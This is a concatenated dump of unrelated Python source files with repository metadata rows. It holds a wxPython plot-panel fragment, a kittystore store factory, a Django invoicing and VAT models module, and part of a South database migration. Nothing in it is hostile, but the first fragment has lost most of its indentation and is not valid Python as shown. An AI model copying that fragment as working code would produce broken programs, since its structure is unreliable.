def onUpdateValues(self, event):
self.pltTS.updateValues()
def onChangeSelection(self, datetime_list):
self.pltTS.changePlotSelection( datetime_list)
def onNumBins(self, numBins):
self.pltHist.changeNumOfBins(numBins)
def onDateChanged(self, startDate, endDate):
self._seriesPlotInfo.updateDateRange(startDate, endDate)
self.redrawPlots()
    def onDateFull(self):
        # Reset the date range to the full extent
        self._seriesPlotInfo.updateDateRange()
        self.redrawPlots()
def onPlotType(self, event, ptype):
self.pltTS.onPlotType(ptype)
self.pltProb.onPlotType(ptype)
def onShowLegend(self, event, isVisible):
try:
self.pltTS.onShowLegend(isVisible)
self.pltProb.onShowLegend(isVisible)
self.legendVisible = isVisible
except AttributeError:
pass
def stopEdit(self):
self._seriesPlotInfo.stopEditSeries()
self.editID = None
self.pltTS.stopEdit()
self.redrawPlots()
def addEditPlot(self, memDB, seriesID, record_service):
self.record_service = record_service
if not self._seriesPlotInfo:
self._seriesPlotInfo = SeriesPlotInfo(memDB, self.taskserver)
self.editID = seriesID
self._seriesPlotInfo.setEditSeries(self.editID)
self.pltTS.setEdit(self.editID)
self.redrawPlots()
def addPlot(self, memDB, seriesID):
"""
Creates the plot
"""
logger.debug("Adding plot")
Publisher.sendMessage("EnablePlotButton", plot=self.getActivePlotID(), isActive=True)
if not self._seriesPlotInfo:
self._seriesPlotInfo = SeriesPlotInfo(memDB, self.taskserver)
self._seriesPlotInfo.update(seriesID, True)
logger.debug("Redrawing plots")
self.redrawPlots()
def onRemovePlot(self, seriesID):
self._seriesPlotInfo.update(seriesID, False)
self.redrawPlots()
def onRemovePlots(self, seriesIDs):
for series in seriesIDs:
self._seriesPlotInfo.update(series.id, False)
self.redrawPlots()
def redrawPlots(self):
logger.debug("Plot Summary")
self.pltSum.Plot(self._seriesPlotInfo)
logger.debug("Plot Probability")
self.pltProb.Plot(self._seriesPlotInfo)
logger.debug("Plot Boxwhisker")
self.pltBox.Plot(self._seriesPlotInfo)
logger.debug("Plot Timeseries")
self.pltTS.Plot(self._seriesPlotInfo)
logger.debug("Plot Histogram")
self.pltHist.Plot(self._seriesPlotInfo)
self.onShowLegend(event=None, isVisible=self.legendVisible)
maxStart, maxEnd, currStart, currEnd = self._seriesPlotInfo.getDates()
Publisher.sendMessage("resetdate", startDate=maxStart, endDate=maxEnd, currStart=currStart, currEnd=currEnd)
def selectPlot(self, value):
self.SetSelection(value)
def getActivePlotID(self):
return self.GetSelection()
def close(self):
self.pltTS.close()
def clear(self):
"""
:return:
"""
if self._seriesPlotInfo:
for seriesID in self._seriesPlotInfo.getSeriesIDs():
self._seriesPlotInfo.update(seriesID, False)
self.redrawPlots()
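# Illustrative sketch of driving this panel through pubsub. Topic names come
# from initPubSub() above; the date values are made up for the example.
#
#   import datetime
#   from wx.lib.pubsub import pub as Publisher
#   Publisher.sendMessage("onDateChanged",
#                         startDate=datetime.date(2014, 1, 1),
#                         endDate=datetime.date(2014, 12, 31))
#   Publisher.sendMessage("onShowLegend", event=None, isVisible=True)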
| bsd-3-clause | -7,721,344,204,155,205,000 | 33.328431 | 116 | 0.622305 | false |
hyperkitty/kittystore | kittystore/__init__.py | 1 | 3228 | # -*- coding: utf-8 -*-
"""
Module entry point: call get_store() to instantiate a KittyStore
implementation.
Copyright (C) 2012 Aurelien Bompard
Author: Aurelien Bompard <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or (at
your option) any later version.
See http://www.gnu.org/copyleft/gpl.html for the full text of the
license.
"""
from __future__ import absolute_import, print_function, unicode_literals
__all__ = ("get_store", "create_store", "MessageNotFound",
"SchemaUpgradeNeeded")
from kittystore.search import SearchEngine
from kittystore.caching import register_events
def _check_settings(settings):
required_keys = ("KITTYSTORE_URL", "KITTYSTORE_SEARCH_INDEX",
"MAILMAN_REST_SERVER", "MAILMAN_API_USER",
"MAILMAN_API_PASS")
for req_key in required_keys:
try:
getattr(settings, req_key)
except AttributeError:
raise AttributeError("The settings file is missing the \"%s\" key" % req_key)
if settings.KITTYSTORE_URL.startswith("mongo://"):
raise NotImplementedError
def _get_search_index(settings):
search_index_path = settings.KITTYSTORE_SEARCH_INDEX
if search_index_path is None:
return None
return SearchEngine(search_index_path)
def get_store(settings, debug=None, auto_create=False):
"""Factory for a KittyStore subclass"""
_check_settings(settings)
if debug is None:
debug = getattr(settings, "KITTYSTORE_DEBUG", False)
search_index = _get_search_index(settings)
if getattr(settings, "KITTYSTORE_USE_STORM", False):
from kittystore.storm import get_storm_store
store = get_storm_store(settings, search_index, debug, auto_create)
else:
from kittystore.sa import get_sa_store
store = get_sa_store(settings, search_index, debug, auto_create)
if search_index is not None and search_index.needs_upgrade():
if auto_create:
search_index.upgrade(store)
else:
store.close()
raise SchemaUpgradeNeeded()
register_events()
return store
def create_store(settings, debug=None):
"""Factory for a KittyStore subclass"""
_check_settings(settings)
if debug is None:
debug = getattr(settings, "KITTYSTORE_DEBUG", False)
search_index = _get_search_index(settings)
if getattr(settings, "KITTYSTORE_USE_STORM", False):
from kittystore.storm import get_storm_store, create_storm_db
version = create_storm_db(settings, debug)
store = get_storm_store(settings, search_index, debug)
else:
from kittystore.sa import create_sa_db, get_sa_store
version = create_sa_db(settings, debug)
store = get_sa_store(settings, search_index, debug)
if search_index is not None and search_index.needs_upgrade():
search_index.upgrade(store)
return store, version
class SchemaUpgradeNeeded(Exception):
"""Raised when there are pending patches"""
class MessageNotFound(Exception):
pass
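# Illustrative usage sketch (assumes a Django-style settings object exposing
# the keys checked in _check_settings above):
#
#   from django.conf import settings
#   try:
#       store = get_store(settings)
#   except SchemaUpgradeNeeded:
#       # apply pending schema/search-index upgrades, then retry
#       store = get_store(settings, auto_create=True)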
| gpl-3.0 | 1,805,717,560,906,570,800 | 32.278351 | 89 | 0.682156 | false |
fgaudin/aemanager | accounts/models.py | 1 | 20254 | # coding=utf-8
from decimal import Decimal
from django.utils.formats import localize
import datetime
from reportlab.platypus import Paragraph, Spacer
from reportlab.lib.units import inch
from reportlab.platypus import Table, TableStyle
from django.db import models, connection
from core.models import OwnedObject
from django.utils.translation import ugettext_lazy as _, ugettext
from contact.models import Contact
from django.core.urlresolvers import reverse
from project.models import Row, Proposal, update_row_amount, \
ROW_CATEGORY_SERVICE, ROW_CATEGORY, PROPOSAL_STATE_ACCEPTED, ProposalRow, \
VAT_RATES_2_1, VAT_RATES_5_5, VAT_RATES_19_6
from django.db.models.aggregates import Sum, Min, Max
from django.db.models.signals import post_save, pre_save, post_delete
from django.core.validators import MaxValueValidator
from accounts.utils.pdf import InvoiceTemplate
PAYMENT_TYPE_CASH = 1
PAYMENT_TYPE_BANK_CARD = 2
PAYMENT_TYPE_TRANSFER = 3
PAYMENT_TYPE_CHECK = 4
PAYMENT_TYPE_PAYPAL = 5
PAYMENT_TYPE_DEBIT = 6
PAYMENT_TYPE = ((PAYMENT_TYPE_CASH, _('Cash')),
(PAYMENT_TYPE_BANK_CARD, _('Bank card')),
(PAYMENT_TYPE_TRANSFER, _('Transfer')),
(PAYMENT_TYPE_CHECK, _('Check')),
(PAYMENT_TYPE_PAYPAL, _('Paypal')),
(PAYMENT_TYPE_DEBIT, _('Debit')))
class Expense(OwnedObject):
date = models.DateField(verbose_name=_('Date'), help_text=_('format: mm/dd/yyyy'), db_index=True)
reference = models.CharField(max_length=50, blank=True, null=True, verbose_name=_('Reference'))
supplier = models.CharField(max_length=70, blank=True, null=True, verbose_name=_('Supplier'))
amount = models.DecimalField(max_digits=12, decimal_places=2, verbose_name=_('Amount'))
payment_type = models.IntegerField(choices=PAYMENT_TYPE, verbose_name=_('Payment type'))
description = models.CharField(max_length=100, blank=True, null=True, verbose_name=_('Description'))
class InvoiceAmountError(Exception):
pass
class InvoiceIdNotUniqueError(Exception):
pass
class InvalidInvoiceIdError(Exception):
pass
MAX_INVOICE_ID = 999999999
INVOICE_STATE_EDITED = 1
INVOICE_STATE_SENT = 2
INVOICE_STATE_PAID = 3
INVOICE_STATE = ((INVOICE_STATE_EDITED, _('Edited')),
(INVOICE_STATE_SENT, _('Sent')),
(INVOICE_STATE_PAID, _('Paid')))
class InvoiceManager(models.Manager):
def get_next_invoice_id(self, owner):
return (Invoice.objects.filter(owner=owner).aggregate(invoice_id=Max('invoice_id'))['invoice_id'] or 0) + 1
def get_paid_sales(self, owner, reference_date=None):
if not reference_date:
reference_date = datetime.date.today()
amount_sum = self.filter(state=INVOICE_STATE_PAID,
owner=owner,
paid_date__lte=reference_date,
paid_date__year=reference_date.year).aggregate(sales=Sum('amount'))
return amount_sum['sales'] or 0
def get_paid_service_sales(self, owner, year=None):
if not year:
year = datetime.date.today().year
amount_sum = InvoiceRow.objects.filter(invoice__state=INVOICE_STATE_PAID,
owner=owner,
category=ROW_CATEGORY_SERVICE,
invoice__paid_date__year=year).aggregate(sales=Sum('amount'))
return amount_sum['sales'] or 0
def get_waiting_payments(self, owner):
amount_sum = self.filter(state=INVOICE_STATE_SENT,
owner=owner).aggregate(sales=Sum('amount'))
return amount_sum['sales'] or 0
def get_waiting_service_payments(self, owner):
amount_sum = InvoiceRow.objects.filter(invoice__state=INVOICE_STATE_SENT,
owner=owner,
category=ROW_CATEGORY_SERVICE).aggregate(sales=Sum('amount'))
return amount_sum['sales'] or 0
def get_late_invoices(self, owner):
late_invoices = self.filter(state=INVOICE_STATE_SENT,
payment_date__lt=datetime.date.today(),
owner=owner)
return late_invoices
def get_late_invoices_for_notification(self):
late_invoices = self.filter(state=INVOICE_STATE_SENT,
payment_date__lt=datetime.date.today(),
owner__notification__notify_late_invoices=True)
return late_invoices
def get_invoices_to_send(self, owner):
invoices_to_send = self.filter(state=INVOICE_STATE_EDITED,
edition_date__lte=datetime.date.today(),
owner=owner)
return invoices_to_send
def get_invoices_to_send_for_notification(self):
invoices_to_send = self.filter(state=INVOICE_STATE_EDITED,
edition_date__lte=datetime.date.today(),
owner__notification__notify_invoices_to_send=True)
return invoices_to_send
def get_paid_sales_for_period(self, owner, begin_date, end_date):
if not begin_date or not end_date:
return 0
amount_sum = self.filter(state=INVOICE_STATE_PAID,
owner=owner,
paid_date__gte=begin_date,
paid_date__lte=end_date).aggregate(sales=Sum('amount'))
return amount_sum['sales'] or 0
def get_waiting_sales_for_period(self, owner, end_date, begin_date=None):
if not end_date:
return 0
amount_sum = self.filter(state__lte=INVOICE_STATE_SENT,
owner=owner,
payment_date__lte=end_date)
if begin_date:
amount_sum = amount_sum.filter(payment_date__gte=begin_date)
amount_sum = amount_sum.aggregate(waiting=Sum('amount'))
return amount_sum['waiting'] or 0
def get_first_invoice_paid_date(self, owner):
return self.filter(owner=owner).aggregate(min_date=Min('paid_date'))['min_date']
def get_paid_invoices(self, owner, begin_date=None):
if not begin_date:
return self.filter(state=INVOICE_STATE_PAID,
owner=owner,
paid_date__year=datetime.date.today().year).order_by('paid_date')
else:
return self.filter(state=INVOICE_STATE_PAID,
owner=owner,
paid_date__lte=datetime.date.today(),
paid_date__gte=begin_date).order_by('paid_date')
def get_waiting_invoices(self, owner):
return self.filter(state__lte=INVOICE_STATE_SENT,
owner=owner).order_by('payment_date')
def get_to_be_invoiced(self, owner):
accepted_proposal_amount_sum = Proposal.objects.filter(state=PROPOSAL_STATE_ACCEPTED,
owner=owner).extra(where=['project_proposal.ownedobject_ptr_id NOT IN (SELECT proposal_id FROM accounts_invoicerow irow JOIN accounts_invoice i ON irow.invoice_id = i.ownedobject_ptr_id WHERE i.state IN (%s,%s) AND irow.balance_payments = %s)'],
params=[INVOICE_STATE_SENT, INVOICE_STATE_PAID, True]).aggregate(amount=Sum('amount'))
        # exclude amounts found in sent or paid invoices referencing an accepted proposal, i.e. what has already been invoiced on proposals that are not balanced yet
invoicerows_to_exclude = InvoiceRow.objects.extra(where=['accounts_invoicerow.proposal_id NOT IN (SELECT proposal_id FROM accounts_invoicerow irow JOIN accounts_invoice i ON irow.invoice_id = i.ownedobject_ptr_id WHERE i.state IN (%s,%s) AND irow.balance_payments = %s)'],
params=[INVOICE_STATE_SENT, INVOICE_STATE_PAID, True]).exclude(invoice__state=INVOICE_STATE_EDITED).filter(owner=owner).aggregate(amount=Sum('amount'))
        # add invoice rows of edited invoices which have no proposal linked
invoicerows_whithout_proposals = InvoiceRow.objects.filter(owner=owner,
proposal=None,
invoice__state=INVOICE_STATE_EDITED).aggregate(amount=Sum('amount'))
return (accepted_proposal_amount_sum['amount'] or 0) - (invoicerows_to_exclude['amount'] or 0) + (invoicerows_whithout_proposals['amount'] or 0)
def get_service_to_be_invoiced(self, owner):
accepted_proposal_amount_sum = ProposalRow.objects.filter(proposal__state=PROPOSAL_STATE_ACCEPTED,
category=ROW_CATEGORY_SERVICE,
owner=owner).extra(where=['project_proposal.ownedobject_ptr_id NOT IN (SELECT proposal_id FROM accounts_invoicerow irow JOIN accounts_invoice i ON irow.invoice_id = i.ownedobject_ptr_id WHERE i.state IN (%s,%s) AND irow.balance_payments = %s)'],
params=[INVOICE_STATE_SENT, INVOICE_STATE_PAID, True]).aggregate(amount=Sum('amount'))
invoicerows_to_exclude = InvoiceRow.objects.filter(proposal__state=PROPOSAL_STATE_ACCEPTED,
category=ROW_CATEGORY_SERVICE,
owner=owner).extra(where=['accounts_invoicerow.proposal_id NOT IN (SELECT proposal_id FROM accounts_invoicerow irow JOIN accounts_invoice i ON irow.invoice_id = i.ownedobject_ptr_id WHERE i.state IN (%s,%s) AND irow.balance_payments = %s)'],
params=[INVOICE_STATE_SENT, INVOICE_STATE_PAID, True]).exclude(invoice__state=INVOICE_STATE_EDITED).filter(owner=owner).aggregate(amount=Sum('amount'))
return (accepted_proposal_amount_sum['amount'] or 0) - (invoicerows_to_exclude['amount'] or 0)
def get_vat_for_period(self, owner, begin_date, end_date):
if not begin_date or not end_date:
return 0
amount_sum_2_1 = InvoiceRow.objects.filter(vat_rate=VAT_RATES_2_1,
invoice__state=INVOICE_STATE_PAID,
invoice__owner=owner,
invoice__paid_date__gte=begin_date,
invoice__paid_date__lte=end_date).aggregate(vat=Sum('amount'))
amount_sum_5_5 = InvoiceRow.objects.filter(vat_rate=VAT_RATES_5_5,
invoice__state=INVOICE_STATE_PAID,
invoice__owner=owner,
invoice__paid_date__gte=begin_date,
invoice__paid_date__lte=end_date).aggregate(vat=Sum('amount'))
amount_sum_19_6 = InvoiceRow.objects.filter(vat_rate=VAT_RATES_19_6,
invoice__state=INVOICE_STATE_PAID,
invoice__owner=owner,
invoice__paid_date__gte=begin_date,
invoice__paid_date__lte=end_date).aggregate(vat=Sum('amount'))
return (amount_sum_2_1['vat'] or 0) * VAT_RATES_2_1 / 100\
+ (amount_sum_5_5['vat'] or 0) * VAT_RATES_5_5 / 100\
+ (amount_sum_19_6['vat'] or 0) * VAT_RATES_19_6 / 100
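# Illustrative usage sketch for InvoiceManager (the `user` object is assumed to
# be the owner of the invoices):
#
#   paid_this_year = Invoice.objects.get_paid_sales(owner=user)
#   waiting = Invoice.objects.get_waiting_payments(owner=user)
#   late = Invoice.objects.get_late_invoices(owner=user)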
class Invoice(OwnedObject):
customer = models.ForeignKey(Contact, blank=True, null=True, verbose_name=_('Customer'))
invoice_id = models.IntegerField(verbose_name=_("Invoice id"))
state = models.IntegerField(choices=INVOICE_STATE, default=INVOICE_STATE_EDITED, verbose_name=_("State"), db_index=True)
amount = models.DecimalField(blank=True, max_digits=12, decimal_places=2, default=0, verbose_name=_("Amount"))
edition_date = models.DateField(verbose_name=_("Edition date"), help_text=_('format: mm/dd/yyyy'), db_index=True)
payment_date = models.DateField(verbose_name=_("Payment date"), help_text=_('format: mm/dd/yyyy'), db_index=True)
payment_type = models.IntegerField(choices=PAYMENT_TYPE, blank=True, null=True, verbose_name=_('Payment type'))
paid_date = models.DateField(blank=True, null=True, verbose_name=_("Paid date"), help_text=_('format: mm/dd/yyyy'), db_index=True)
execution_begin_date = models.DateField(blank=True, null=True, verbose_name=_("Execution begin date"), help_text=_('format: mm/dd/yyyy'))
execution_end_date = models.DateField(blank=True, null=True, verbose_name=_("Execution end date"), help_text=_('format: mm/dd/yyyy'))
penalty_date = models.DateField(blank=True, null=True, verbose_name=_("Penalty date"), help_text=_('format: mm/dd/yyyy'))
penalty_rate = models.DecimalField(blank=True, null=True, max_digits=4, decimal_places=2, verbose_name=_("Penalty rate"))
discount_conditions = models.CharField(max_length=100, blank=True, null=True, verbose_name=_("Discount conditions"))
footer_note = models.CharField(max_length=90, blank=True, null=True, verbose_name=_('Footer note'))
objects = InvoiceManager()
class Meta:
ordering = ['invoice_id']
def __unicode__(self):
return "<a href=\"%s\">%s</a>" % (reverse('invoice_detail', kwargs={'id' : self.id}), ugettext("invoice #%d") % (self.invoice_id))
def isInvoiceIdValid(self):
validator = MaxValueValidator(MAX_INVOICE_ID)
try:
validator(self.invoice_id)
except:
return False
return True
def isInvoiceIdUnique(self, owner):
invoices = Invoice.objects.filter(owner=owner,
invoice_id=self.invoice_id)
if self.id:
invoices = invoices.exclude(id=self.id)
if len(invoices):
return False
return True
def getNature(self):
natures = self.invoice_rows.values_list('category', flat=True).order_by('category').distinct()
result = []
natures_dict = dict(ROW_CATEGORY)
for nature in natures:
result.append(unicode(natures_dict[nature]))
return " & ".join(result)
def save(self, force_insert=False, force_update=False, using=None, user=None):
if not self.isInvoiceIdValid():
raise InvalidInvoiceIdError(ugettext('Invoice id must be less than or equal to %d') % (MAX_INVOICE_ID))
if not self.isInvoiceIdUnique(user):
raise InvoiceIdNotUniqueError(ugettext("Invoice id must be unique"))
super(Invoice, self).save(force_insert, force_update, using, user)
def check_amounts(self):
proposals = Proposal.objects.filter(invoice_rows__invoice=self).distinct()
for proposal in proposals:
remaining_amount = proposal.get_remaining_to_invoice(exclude_invoice=self)
rows_amount = InvoiceRow.objects.filter(invoice=self,
proposal=proposal).aggregate(amount=Sum('amount'))['amount'] or 0
if float(remaining_amount) < float(rows_amount):
raise InvoiceRowAmountError(ugettext("Amounts invoiced can't be greater than proposals remaining amounts"))
return True
def get_vat(self):
cursor = connection.cursor()
cursor.execute('SELECT SUM(accounts_invoicerow.amount * accounts_invoicerow.vat_rate / 100) AS "vat" FROM "accounts_invoicerow" WHERE "accounts_invoicerow"."invoice_id" = %s', [self.id])
row = cursor.fetchone()
vat = row[0] or Decimal(0)
vat = vat.quantize(Decimal(1)) if vat == vat.to_integral() else vat.normalize()
return vat
def amount_including_tax(self):
return self.amount + self.get_vat()
def to_pdf(self, user, response):
filename = ugettext('invoice_%(invoice_id)d.pdf') % {'invoice_id': self.invoice_id}
response['Content-Disposition'] = 'attachment; filename=%s' % (filename)
invoice_template = InvoiceTemplate(response, user)
invoice_template.init_doc(ugettext('Invoice #%(invoice_id)d') % {'invoice_id': self.invoice_id})
invoice_template.add_headers(self, self.customer, self.edition_date)
invoice_template.add_title(_("INVOICE #%d") % (self.invoice_id))
# proposal row list
rows = self.invoice_rows.all()
invoice_template.add_rows(rows)
# total amount on the right side of footer
right_block = invoice_template.get_total_amount(self.amount, rows)
invoice_amount = self.amount
invoice_amount = invoice_amount.quantize(Decimal(1)) if invoice_amount == invoice_amount.to_integral() else invoice_amount.normalize()
left_block = [Paragraph(_("Payment date : %s") % (localize(self.payment_date)), InvoiceTemplate.styleN),
Paragraph(_("Penalty begins on : %s") % (localize(self.penalty_date) or ''), InvoiceTemplate.styleN),
Paragraph(_("Penalty rate : %s") % (localize(self.penalty_rate) or ''), InvoiceTemplate.styleN),
Paragraph(_("Discount conditions : %s") % (self.discount_conditions or ''), InvoiceTemplate.styleN)]
if self.footer_note:
left_block.append(Spacer(invoice_template.doc.width, 0.1 * inch))
left_block.append(Paragraph(self.footer_note, InvoiceTemplate.styleNSmall))
else:
left_block.append(Spacer(invoice_template.doc.width, 0.2 * inch))
if self.owner.get_profile().iban_bban:
left_block.append(Paragraph(_("IBAN/BBAN : %s") % (self.owner.get_profile().iban_bban), InvoiceTemplate.styleNSmall))
if self.owner.get_profile().bic:
left_block.append(Paragraph(_("BIC/SWIFT : %s") % (self.owner.get_profile().bic), InvoiceTemplate.styleNSmall))
data = [[left_block,
'',
right_block], ]
if self.execution_begin_date and self.execution_end_date:
data[0][0].insert(1, Paragraph(_("Execution dates : %(begin_date)s to %(end_date)s") % {'begin_date': localize(self.execution_begin_date), 'end_date' : localize(self.execution_end_date)}, InvoiceTemplate.styleN))
footer_table = Table(data, [4.5 * inch, 0.3 * inch, 2.5 * inch], [1 * inch])
footer_table.setStyle(TableStyle([('VALIGN', (0, 0), (-1, -1), 'TOP'), ]))
invoice_template.append_to_story(footer_table)
invoice_template.build()
return response
class InvoiceRowAmountError(Exception):
pass
class InvoiceRow(Row):
invoice = models.ForeignKey(Invoice, related_name="invoice_rows")
proposal = models.ForeignKey(Proposal, related_name="invoice_rows", verbose_name=_('Proposal'), null=True, blank=True)
balance_payments = models.BooleanField(verbose_name=_('Balance payments for the proposal'), help_text=_('"Balancing payments for the proposal" means there will be no future invoices for the selected proposal. Thus the amount remaining to invoice for this proposal will fall to zero and its state will be set to "balanced" when all invoices are paid.'))
class Meta:
ordering = ['id']
def save(self, force_insert=False, force_update=False, using=None, user=None):
super(InvoiceRow, self).save(force_insert, force_update, using, user)
def update_invoice_amount(sender, instance, created=None, **kwargs):
row = instance
invoice = row.invoice
invoice.amount = invoice.invoice_rows.all().aggregate(sum=Sum('amount'))['sum'] or 0
invoice.save(user=invoice.owner)
pre_save.connect(update_row_amount, sender=InvoiceRow)
post_save.connect(update_invoice_amount, sender=InvoiceRow)
post_delete.connect(update_invoice_amount, sender=InvoiceRow)
| agpl-3.0 | 442,697,370,310,873,200 | 56.214689 | 356 | 0.604325 | false |
updatengine/updatengine-server | configuration/migrations/0005_auto__add_subuser.py | 1 | 11187 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'subuser'
db.create_table(u'configuration_subuser', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.OneToOneField')(related_name='subuser', unique=True, to=orm['auth.User'])),
))
db.send_create_signal(u'configuration', ['subuser'])
# Adding M2M table for field entity on 'subuser'
m2m_table_name = db.shorten_name(u'configuration_subuser_entity')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('subuser', models.ForeignKey(orm[u'configuration.subuser'], null=False)),
('entity', models.ForeignKey(orm[u'inventory.entity'], null=False))
))
db.create_unique(m2m_table_name, ['subuser_id', 'entity_id'])
def backwards(self, orm):
# Deleting model 'subuser'
db.delete_table(u'configuration_subuser')
# Removing M2M table for field entity on 'subuser'
db.delete_table(db.shorten_name(u'configuration_subuser_entity'))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'configuration.deployconfig': {
'Meta': {'object_name': 'deployconfig'},
'activate_deploy': ('django.db.models.fields.CharField', [], {'default': "'yes'", 'max_length': '3'}),
'activate_time_deploy': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
'end_time': ('django.db.models.fields.TimeField', [], {}),
'entity': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': u"orm['inventory.entity']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': "'100'"}),
'packageprofile': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': u"orm['deploy.packageprofile']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'start_time': ('django.db.models.fields.TimeField', [], {}),
'timeprofile': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': u"orm['deploy.timeprofile']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
u'configuration.subuser': {
'Meta': {'object_name': 'subuser'},
'entity': ('django.db.models.fields.related.ManyToManyField', [], {'default': 'None', 'to': u"orm['inventory.entity']", 'null': 'True', 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'subuser'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'deploy.package': {
'Meta': {'ordering': "['name']", 'object_name': 'package'},
'command': ('django.db.models.fields.TextField', [], {'max_length': '1000'}),
'conditions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['deploy.packagecondition']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'filename': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignoreperiod': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'packagesum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'}),
'public': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'})
},
u'deploy.packagecondition': {
'Meta': {'ordering': "['name']", 'object_name': 'packagecondition'},
'depends': ('django.db.models.fields.CharField', [], {'default': "'installed'", 'max_length': '12'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'softwarename': ('django.db.models.fields.CharField', [], {'default': "'undefined'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'softwareversion': ('django.db.models.fields.CharField', [], {'default': "'undefined'", 'max_length': '500', 'null': 'True', 'blank': 'True'})
},
u'deploy.packageprofile': {
'Meta': {'ordering': "['name']", 'object_name': 'packageprofile'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'packages': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['deploy.package']", 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['deploy.packageprofile']"})
},
u'deploy.timeprofile': {
'Meta': {'ordering': "['start_time']", 'object_name': 'timeprofile'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'end_time': ('django.db.models.fields.TimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'start_time': ('django.db.models.fields.TimeField', [], {})
},
u'inventory.entity': {
'Meta': {'ordering': "['name']", 'object_name': 'entity'},
'description': ('django.db.models.fields.TextField', [], {'max_length': '1000'}),
'force_packageprofile': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
'force_timeprofile': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
